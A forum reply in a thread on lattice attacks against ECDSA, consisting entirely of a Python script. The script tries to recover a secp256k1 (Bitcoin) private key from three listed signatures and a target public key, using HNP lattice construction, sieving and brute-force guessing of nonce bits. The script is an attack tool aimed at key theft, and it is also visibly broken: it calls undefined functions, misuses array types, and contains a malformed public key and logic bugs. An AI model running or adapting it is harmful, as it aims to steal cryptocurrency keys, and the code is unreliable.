Post
Topic
Board Development & Technical Discussion
Re: Attacking ECDSA by Lattice Sieving: Bridging Gap with Fourier Analysis Attacks
by
bisovskiy
on 19/10/2024, 16:05:06 UTC
import os
os.environ['CUDA_PATH'] = '/usr/local/cuda-11.5'

import time
import logging
import multiprocessing
import cupy as cp
import numpy as np
import pickle
import ecdsa
from ecdsa.ellipticcurve import Point
from ecdsa.curves import SECP256k1
import itertools

logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)

# Print CUDA version for verification
logger.info(f"CUDA version: {cp.cuda.runtime.runtimeGetVersion()}")
logger.info(f"CuPy version: {cp.__version__}")

# Definition of the SECP256k1 curve and the base point G
curve = SECP256k1.curve
G = SECP256k1.generator
n = SECP256k1.order
p = SECP256k1.curve.p()
b = SECP256k1.curve.b()

def ecdsa_to_hnp(signatures, l):
    logger.info(f"Converting {len(signatures)} ECDSA signatures to HNP instances")
    q = n
    w = q // (2**(l+1))
    samples = []
    for sig in signatures:
        r = int(sig['r'], 16)
        s = int(sig['s'], 16)
        z = int(sig['z'], 16)

        t = (r * pow(s, -1, q)) % q
        a = (z * pow(s, -1, q) - w) % q
       
        samples.append((t, a))
    logger.info(f"Conversion complete. Generated {len(samples)} HNP samples")
    return samples

def construct_lattice(samples, x, l):
    logger.info(f"Constructing lattice with {len(samples)} samples, x={x}, l={l}")
    m = len(samples)
    q = int(n)
    w = q // (2**(l+1))
   
    B = np.zeros((m+1, m+1), dtype=object)
    for i in range(m):
        B[i, i] = q
    B[m-1, :m] = np.array([x * t for t, _ in samples], dtype=object)
    B[m-1, m-1] = x
    B[m, :m] = np.array([a for _, a in samples], dtype=object)
    B[m, m] = int((w * w // 3)**0.5)   
    logger.info(f"Lattice construction complete. Dimension: {B.shape[0]} x {B.shape[1]}")
    return B

def gpu_lll(B, delta=0.99):
    logger.info(f"Starting GPU-accelerated LLL reduction on {B.shape[0]}x{B.shape[1]} matrix")
    Q, R = qr(B)
    n = B.shape[0]
    k = 1
    while k < n:
        for j in range(k-1, -1, -1):
            mu = cp.round(R[j,k] / R[j,j])
            if mu != 0:
                R[:j+1,k] -= mu * R[:j+1,j]
                Q[:,k] -= mu * Q[:,j]
        if delta * R[k-1,k-1]**2 > R[k,k]**2 + R[k-1,k]**2:
            R[[k-1,k]] = R[[k,k-1]]
            Q[:,[k-1,k]] = Q[:,[k,k-1]]
            k = max(k-1, 1)
        else:
            k += 1
    logger.info("GPU-accelerated LLL reduction complete")
    return Q @ R

def gpu_bkz(B, block_size=20):
    logger.info(f"Starting GPU-accelerated BKZ reduction with block size {block_size}")
    n = B.shape[0]
    for i in range(0, n - block_size + 1):
        logger.debug(f"Processing block {i}/{n - block_size}")
        block = B[i:i+block_size, i:i+block_size]
        block = gpu_lll(block)
        B[i:i+block_size, i:i+block_size] = block
    logger.info("GPU-accelerated BKZ reduction complete")
    return B

def gauss_sieve(B, target_norm, max_list_size=None):
    logger.info(f"Starting Gauss sieve with target norm {target_norm}")
    L = []
    S = []
    C = B.get().tolist()  # Convert CuPy array to list
   
    while C:
        v = C.pop(0)
        v = cp.array(v)  # Convert back to CuPy array for GPU operations
        if cp.linalg.norm(v) > target_norm:
            continue
       
        if not L:
            L.append(v)
            continue
       
        changed = True
        while changed:
            changed = False
            for w in L:
                if cp.linalg.norm(v - w) < cp.linalg.norm(v):
                    v = v - w
                    changed = True
                    break
                elif cp.linalg.norm(v + w) < cp.linalg.norm(v):
                    v = v + w
                    changed = True
                    break
       
        if cp.linalg.norm(v) <= target_norm:
            L.append(v)
            if max_list_size and len(L) > max_list_size:
                L.sort(key=lambda x: cp.linalg.norm(x))
                L = L[:max_list_size]
        else:
            S.append(v)
   
    logger.info(f"Gauss sieve complete. Found {len(L)} vectors")
    return L

def interval_reduction(low, high, samples, q, l):
    logger.info(f"Starting interval reduction: [{low}, {high}]")
    M = high - low + 1
    N = int(np.log2(M).ceil())
    R = [(low, high)]
   
    for t, a in samples[:N]:
        R_new = []
        for interval in R:
            low, high = interval
            n_min = ((t * low - a - q/(2**(l+1))) // q).ceil()
            n_max = ((t * high - a + q/(2**(l+1))) // q).floor()
            for n in range(n_min, n_max + 1):
                new_low = max(low, ((a + n*q - q/(2**(l+1))) // t).ceil())
                new_high = min(high, ((a + n*q + q/(2**(l+1))) // t).floor())
                if new_low <= new_high:
                    R_new.append((new_low, new_high))
        R = R_new
   
    logger.info(f"Interval reduction complete. Resulting intervals: {len(R)}")
    return R

def pre_screening(alpha0, samples, q, l, x):
    logger.debug(f"Pre-screening candidate α₀: {alpha0}")
    w = q // (2**(l+1))
    result = all(abs(((x * t * alpha0 - a + q//2) % q) - q//2) <= w + q//(2**(l+4)) for t, a in samples)
    logger.debug(f"Pre-screening result: {'Passed' if result else 'Failed'}")
    return result

def improved_linear_predicate(v, samples, q, l, tau):
    logger.debug(f"Checking improved linear predicate for v: {v}")
    if v[0] == 0 or abs(v[0]) > q/(2**(l+1)) or abs(v[1]) != tau:
        logger.debug("Predicate failed initial checks")
        return None
   
    k0 = -np.sign(v[1]) * v[0] + q/(2**(l+1))
    alpha = (Mod(samples[0][1] + k0, q) * Mod(samples[0][0], q)**(-1)) % q
   
    N = 2 * int(np.log2(q).ceil())
    M = sum(1 for t, a in samples[:N] if abs((t * alpha - a) % q) < q/(2**l))
   
    if M > N * (1 - np.log2(q)/(2**l) + 2**(-l)) / 2:
        logger.debug(f"Predicate passed. Potential α: {alpha}")
        return int(alpha)
    logger.debug("Predicate failed final check")
    return None

def decomposition_predicate(v, samples, q, l, tau, x):
    logger.debug(f"Checking decomposition predicate for v: {v}")
    if v[0] == 0 or abs(v[0]) > q/(2**(l+1)) or abs(v[1]) != tau:
        logger.debug("Decomposition predicate failed initial checks")
        return None
   
    low = -np.sign(v[1]) * v[0] - x//2
    high = -np.sign(v[1]) * v[0] + x//2
   
    R = interval_reduction(low, high, samples, q, l)
   
    for interval in R:
        for h in range(interval[0], interval[1] + 1):
            alpha = improved_linear_predicate((h, -tau), samples, q, l, tau)
            if alpha is not None and pre_screening(alpha, samples, q, l, x):
                logger.info(f"Decomposition predicate found potential solution: {alpha}")
                return alpha
   
    logger.debug("Decomposition predicate failed to find a solution")
    return None

def progressive_bkz_sieve(B, predicate, start_dim=20, step=5, max_dim=None):
    if max_dim is None:
        max_dim = B.shape[0]
   
    for d in range(start_dim, max_dim + 1, step):
        logger.info(f"Processing dimension {d}")
        B_sub = B[:d, :d]
       
        B_sub = gpu_bkz(B_sub, block_size=min(20, d))
       
        target_norm = cp.sqrt(4/3) * cp.linalg.det(B_sub)**(1/d)
        logger.info(f"Target norm for dimension {d}: {target_norm}")
        sieved_vectors = gauss_sieve(B_sub, target_norm, max_list_size=d*10)
       
        logger.info(f"Checking predicates for {len(sieved_vectors)} vectors")
        for v in sieved_vectors:
            sk = predicate(v[-2:])
            if sk is not None:
                logger.info(f"Found potential solution: {sk}")
                return sk
   
    logger.info("Progressive BKZ-sieve completed without finding a solution")
    return None


def try_nonce_patterns(args):
    signatures, l, x, pubkey, patterns = args
    logger.info(f"Trying nonce pattern: {patterns}")
    modified_sigs = [{**sig, 'r': hex(int(sig['r'], 16) ^ (p << (256 - l)))[2:].zfill(64)}
                     for sig, p in zip(signatures, patterns)]
    samples = ecdsa_to_hnp(modified_sigs, l)
    B = construct_lattice(samples, x, l)
   
    def predicate(v):
        return decomposition_predicate(v, samples, int(n), l, int(B[-1, -1].get()), x)
   
    sk = progressive_bkz_sieve(B, predicate, start_dim=20)
   
    if sk:
        recovered_pubkey_point = sk * G
        recovered_pubkey = '04' + hex(recovered_pubkey_point[0])[2:].zfill(64) + hex(recovered_pubkey_point[1])[2:].zfill(64)
        if recovered_pubkey == pubkey:
            logger.info(f"Successfully recovered private key: {hex(sk)}")
            return sk
    logger.info(f"Failed to recover private key for pattern: {patterns}")
    return None

def save_progress(completed_patterns):
    logger.info(f"Saving progress. Completed patterns: {len(completed_patterns)}")
    with open("progress.pkl", "wb") as f:
        pickle.dump(completed_patterns, f)

def load_progress():
    if os.path.exists("progress.pkl"):
        with open("progress.pkl", "rb") as f:
            completed_patterns = pickle.load(f)
        logger.info(f"Loaded progress. Completed patterns: {len(completed_patterns)}")
        return completed_patterns
    logger.info("No previous progress found. Starting from scratch.")
    return set()

def main():
    signatures = [
        {
            'r': '1e8e175bd4fe465c4be9999840cc5bc50d8da9195d10e3350ebf388e429df874',
            's': 'dedd1a4422041d6d2a5c2dabba51d45b4bb9d233baed5cd4caf54e3d0a80d47e',
            'z': '941e563da856ee60678e59c7fdb71d3ed476c9322b3fcd4133dd677d07c82ff7',
        },
        {
            'r': '48939db78d89e510ce280efb8ec47c11af39bcd58d59b87b690a33b0322fd73e',
            's': '62eda7479b658e06bb83d0135d69553d838ca9f7bd63ed7294ed59e2bd37c492',
            'z': 'ce4b9ad74ce61b4ac087f2b0404d313f61d86eed00923806b0d83e9a4559140f',
        },
        {
            'r': '58347d292315a1c7a273b66d7bde268f2c8daad892bddcfe77df4891af48e4ea',
            's': 'c3bbcf5912b25738f7bd2379b57e40f290ca84ed87380c05326b49635f7ad1fc',
            'z': 'fd74693fed61ef0cd6b7bd7284057fe747ee29e39b663520b227e56f8ce1f9bc',
        }
    ]
   
    l = 7  # 6-bit guessing
    x = 2**15
    pubkey = "04f22b7f1e9990eeac8570517a567d46c1f173f6670244cca6184f59e350312129671e4f5a614e1 64d151a5836bab8684e24bfe247141b7e30251bb7290e275e69"
   
    all_patterns = list(itertools.product(range(2**l), repeat=len(signatures)))
    completed_patterns = load_progress()
    patterns_to_try = [p for p in all_patterns if p not in completed_patterns]
   
    num_processors = min(24, multiprocessing.cpu_count())
    logger.info(f"Using {num_processors} processors")

    try:
        with multiprocessing.Pool(num_processors) as pool:
            args = [(signatures, l, x, pubkey, pattern) for pattern in patterns_to_try]
            for i, result in enumerate(pool.imap_unordered(try_nonce_patterns, args)):
                if result is not None:
                    print(f"Successfully recovered private key: {hex(result)}")
                    return
                completed_patterns.add(patterns_to_try)
                if (i+1) % 1000 == 0:
                    save_progress(completed_patterns)
                    logger.info(f"Completed {i+1}/{len(patterns_to_try)} pattern combinations")
    except KeyboardInterrupt:
        logger.info("Interrupted by user. Saving progress...")
        save_progress(completed_patterns)
   
    print("Failed to recover the private key.")

if __name__ == "__main__":
    main()